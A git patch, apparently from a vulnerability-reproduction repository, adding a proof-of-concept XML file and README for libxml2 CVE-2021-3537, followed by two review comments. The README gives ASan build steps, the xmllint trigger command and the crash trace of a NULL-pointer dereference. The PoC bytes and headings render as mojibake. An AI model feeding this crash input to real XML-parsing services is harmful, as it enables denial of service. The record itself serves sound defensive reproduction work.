From 14add2868a65ec99762877175d8091963184d95d Mon Sep 17 00:00:00 2001 From: "LI, WENJIE" Date: Wed, 30 Nov 2022 22:05:59 +0800 Subject: [PATCH] add CVE-2021-3537. --- .../2021/CVE-2021-3537/CVE-2021-3537-poc | 23 ++++ cve/libxml2/2021/CVE-2021-3537/README.md | 118 ++++++++++++++++++ 2 files changed, 141 insertions(+) create mode 100644 cve/libxml2/2021/CVE-2021-3537/CVE-2021-3537-poc create mode 100644 cve/libxml2/2021/CVE-2021-3537/README.md diff --git a/cve/libxml2/2021/CVE-2021-3537/CVE-2021-3537-poc b/cve/libxml2/2021/CVE-2021-3537/CVE-2021-3537-poc new file mode 100644 index 00000000..83fe4f1b --- /dev/null +++ b/cve/libxml2/2021/CVE-2021-3537/CVE-2021-3537-poc @@ -0,0 +1,23 @@ +<:> + + + + + +<÷ßóELEMEÿÿ<:> + + + + + +<]@? \ No newline at end of file diff --git a/cve/libxml2/2021/CVE-2021-3537/README.md b/cve/libxml2/2021/CVE-2021-3537/README.md new file mode 100644 index 00000000..56b1d099 --- /dev/null +++ b/cve/libxml2/2021/CVE-2021-3537/README.md 
@@ -0,0 +1,118 @@ +## æ¼æ´žéªŒè¯ +### 下载æºç  +https://gitee.com/openkylin/libxml2 (版本:2.9.10+dfsg-ok1) + +### 编译 +```bash +$ cd libxml2 +#下载编译ä¾èµ– +$ sudo apt install libicu-dev liblzma-dev libpython3-all-dbg libpython3-all-dev pkg-config python3-all-dbg python3-all-dev rename zlib1g-dev +#å¼€å¯-ggdb -fsanitize=address +$ CFLAGS="-ggdb -fsanitize=address" ./configure +#编译 +$ make +``` + +### æ¼æ´žå¤çް +```bash +$ ./xmllint --recover --postvalid ../CVE/CVE-2021-3537-poc +../CVE/CVE-2021-3537-poc:1: parser error : xmlParseDocTypeDecl : no DOCTYPE name ! +' +:(<:> + ^ +../CVE/CVE-2021-3537-poc:5: parser error : ContentDecl : Name or '(' expected +:(.,()+><:> + ^ +../CVE/CVE-2021-3537-poc:5: parser error : internal error: xmlParseInternalSubset: error detected in Markup declaration + +:(.,()+><:> + ^ +../CVE/CVE-2021-3537-poc:5: parser error : DOCTYPE improperly terminated +:(.,()+><:> + ^ +../CVE/CVE-2021-3537-poc:5: namespace error : Failed to parse QName ':' +:(.,()+><:> + ^ +../CVE/CVE-2021-3537-poc:11: parser error : Couldn't find end of Start Tag YPE line 11 +<:> + ^ +../CVE/CVE-2021-3537-poc:23: parser error : StartTag: invalid element name +<]@? + ^ +../CVE/CVE-2021-3537-poc:23: parser error : EndTag: '<]@? + ^ +output error : string is not in UTF-8 + + +]> +<:> + + + + + +<:> + + + + + +]@? +AddressSanitizer:DEADLYSIGNAL +================================================================= +==18011==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f16b52bdd80 bp 0x7ffe22b96a50 sp 0x7ffe22b96920 T0) +==18011==The signal is caused by a READ memory access. +==18011==Hint: address points to the zero page. 
+ #0 0x7f16b52bdd7f in xmlValidBuildAContentModel /data1/libxml2-openkylin-yangtze/valid.c:729 + #1 0x7f16b52bebc7 in xmlValidBuildContentModel__internal_alias /data1/libxml2-openkylin-yangtze/valid.c:839 + #2 0x7f16b52d0c69 in xmlValidateElementContent /data1/libxml2-openkylin-yangtze/valid.c:5330 + #3 0x7f16b52d4ab6 in xmlValidateOneElement__internal_alias /data1/libxml2-openkylin-yangtze/valid.c:6234 + #4 0x7f16b52d61c3 in xmlValidateElement__internal_alias /data1/libxml2-openkylin-yangtze/valid.c:6479 + #5 0x7f16b52d8893 in xmlValidateDocument__internal_alias /data1/libxml2-openkylin-yangtze/valid.c:6942 + #6 0x564d2e3c2703 in parseAndPrintFile /data1/libxml2-openkylin-yangtze/xmllint.c:2799 + #7 0x564d2e3c8cba in main /data1/libxml2-openkylin-yangtze/xmllint.c:3728 + #8 0x7f16b4f7c0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) + #9 0x564d2e3b8aed in _start (/data1/libxml2-openkylin-yangtze/.libs/xmllint+0xfaed) + +AddressSanitizer can not provide additional info. +SUMMARY: AddressSanitizer: SEGV /data1/libxml2-openkylin-yangtze/valid.c:729 in xmlValidBuildAContentModel +==18011==ABORTING +``` \ No newline at end of file -- Gitee
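Review bot: the PoC hunk stores raw, non-UTF-8 bytes as a text diff (`+<÷ßóELEMEÿÿ<:>`, and `output error : string is not in UTF-8` in the README's own run confirms the file is not valid text), so the bytes can be altered by encoding or line-ending normalization on checkout, and the README's reproduction output already echoes content (`:(<:>`, `:(.,()+><:>`) that does not match the hunk as rendered here. Mark the file as binary in `.gitattributes` (or commit it base64-encoded with a decode step in the README) and record its checksum in the README so anyone reproducing can verify they have the intended input before building with ASan.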
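Review bot: the README never states what the crash is, although the trace shows it: `SEGV on unknown address 0x000000000000` with `address points to the zero page` in `xmlValidBuildAContentModel valid.c:729`, i.e. a NULL pointer dereference during DTD content-model validation, reachable only because `--postvalid` is passed, with denial of service as the impact. Add one sentence saying so under the reproduction heading, and note the fixed libxml2 version or upstream fix reference (left as a placeholder if unknown) so readers can tell whether a given build is affected. Two smaller points: the command uses `../CVE/CVE-2021-3537-poc` while the file is committed at `cve/libxml2/2021/CVE-2021-3537/CVE-2021-3537-poc`, and the stack trace paths (`/data1/libxml2-openkylin-yangtze/`) do not match the `cd libxml2` directory in the build steps; align the paths so the steps reproduce as written. Finally, the headings render as mojibake in this view (e.g. `## æ¼æ´žéªŒè¯`); confirm the file is saved as UTF-8 so the section titles display correctly on Gitee.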